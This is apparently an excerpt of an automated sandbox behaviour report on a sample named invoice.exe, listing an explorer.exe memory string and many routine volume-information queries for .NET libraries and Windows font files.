Source: explorer.exe, 00000002.00000000.280599446.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.353491387.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.331805855.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Users\user\Desktop\invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
